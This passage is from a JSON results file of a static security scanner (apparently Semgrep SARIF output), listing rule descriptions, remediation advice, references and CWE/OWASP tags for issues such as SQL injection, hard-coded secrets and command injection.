variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli)\n - [https://www.npmjs.com/package/mssql](https://www.npmjs.com/package/mssql)\n","text":"Detected string concatenation with a non-literal variable in a `mssql` JS SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries or prepared statements instead. You can use parameterized statements like so: `$REQ.input('USER_ID', mssql.Int, id);`"},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","id":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","name":"javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mssql-sqli.node-mssql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"help":{"markdown":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-textual-sql)\n - [https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm](https://www.tutorialspoint.com/sqlalchemy/sqlalchemy_quick_guide.htm)\n - [https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column](https://docs.sqlalchemy.org/en/14/core/tutorial.html#using-more-specific-text-with-table-expression-literal-column-and-expression-column)\n","text":"Detected user input used to manually construct a SQL string. This is usually bad practice because manual construction could accidentally result in a SQL injection. An attacker could use a SQL injection to steal or modify contents of the database. Instead, use a parameterized query which is available by default in most database engines. Alternatively, consider using an object-relational mapper (ORM) such as SQLAlchemy which will protect your queries."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.tainted-sql-string.tainted-sql-string","id":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","name":"python.flask.security.injection.tainted-sql-string.tainted-sql-string","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.tainted-sql-string.tainted-sql-string"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","id":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","name":"python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.peewee.python-peewee-pg-empty-password.python-peewee-pg-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"help":{"markdown":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"When data from an untrusted source is put into a logger and not neutralized correctly, an attacker could forge log entries or include malicious content."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","id":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","name":"java.lang.security.audit.crlf-injection-logs.crlf-injection-logs","properties":{"precision":"very-high","tags":["CWE-93: Improper Neutralization of CRLF Sequences ('CRLF Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crlf-injection-logs.crlf-injection-logs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"help":{"markdown":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation)\n - [https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib](https://stackoverflow.com/questions/41740361/is-it-safe-to-disable-ssl-certificate-verification-in-pythonss-requests-lib)\n","text":"Certificate verification has been explicitly disabled. This permits insecure connections to insecure servers. Re-enable certification validation."},"helpUri":"https://semgrep.dev/r/python.requests.security.disabled-cert-validation.disabled-cert-validation","id":"python.requests.security.disabled-cert-validation.disabled-cert-validation","name":"python.requests.security.disabled-cert-validation.disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.requests.security.disabled-cert-validation.disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","id":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","name":"java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.jedis.secrets.jedissentinelpool-constructor-hardcoded-secret.jedissentinelpool-constructor-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"help":{"markdown":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"It looks like you're using an implementation of XSSRequestWrapper from dzone. (https://www.javacodegeeks.com/2012/07/anti-cross-site-scripting-xss-filter.html) The XSS filtering in this code is not secure and can be bypassed by malicious actors. It is recommended to use a stack that automatically escapes in your view or templates instead of filtering yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","id":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","name":"java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xssrequestwrapper-is-insecure.xssrequestwrapper-is-insecure"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal)\n - [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Laravel_Cheat_Sheet.md#path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the file path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In PHP, this can lead to both local file inclusion (LFI) or remote file inclusion (RFI) if user input reaches this statement. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/php.laravel.security.laravel-path-traversal.laravel-path-traversal","id":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","name":"php.laravel.security.laravel-path-traversal.laravel-path-traversal","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: php.laravel.security.laravel-path-traversal.laravel-path-traversal"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"help":{"markdown":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag)\n - [https://owasp.org/www-community/controls/SecureCookieAttribute](https://owasp.org/www-community/controls/SecureCookieAttribute)\n","text":"A cookie was detected without setting the 'secure' flag. The 'secure' flag for cookies prevents the client from transmitting the cookie over insecure channels such as HTTP. Set the 'secure' flag by calling '$COOKIE.setSecure(true);'"},"helpUri":"https://semgrep.dev/r/java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","id":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","name":"java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.audit.cookie-missing-secure-flag.cookie-missing-secure-flag"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"help":{"markdown":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"Detected hardcoded password used in basic authentication in a controller class. Including this password in version control could expose this credential. Consider refactoring to use environment variables or configuration files."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","id":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","name":"ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.hardcoded-http-auth-in-controller.hardcoded-http-auth-in-controller"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://www.stackhawk.com/blog/command-injection-python/](https://www.stackhawk.com/blog/command-injection-python/)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","id":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","name":"python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.code.tainted-code-stdlib-fastapi.tainted-code-stdlib-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","id":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","name":"java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.net.http.passwordauthentication-hardcoded-password.passwordauthentication-hardcoded-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","id":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","name":"python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.cassandra.python-cassandra-empty-password.python-cassandra-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","id":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","name":"swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.aes-hardcoded-secret.aes-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","id":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","name":"go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-hardcoded-secret.pgx-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","id":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","name":"java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.crypto.hardcoded-secret-key-spec.hardcoded-secret-key-spec"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"help":{"markdown":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.require-request.require-request)\n - [https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it](https://github.com/google/node-sec-roadmap/blob/master/chapter-2/dynamism.md#dynamism-when-you-need-it)\n","text":"If an attacker controls the x in require(x) then they can cause code to load that was not intended to run on the server."},"helpUri":"https://semgrep.dev/r/javascript.express.security.require-request.require-request","id":"javascript.express.security.require-request.require-request","name":"javascript.express.security.require-request.require-request","properties":{"precision":"very-high","tags":["CWE-706: Use of Incorrectly-Resolved Name or Reference","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.require-request.require-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","id":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","name":"javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.knex.node-knex-empty-password-connection-string.node-knex-empty-password-connection-string"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.aws-lambda.os.tainted-os-command-stdlib-aws-lambda.tainted-os-command-stdlib-aws-lambda)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the 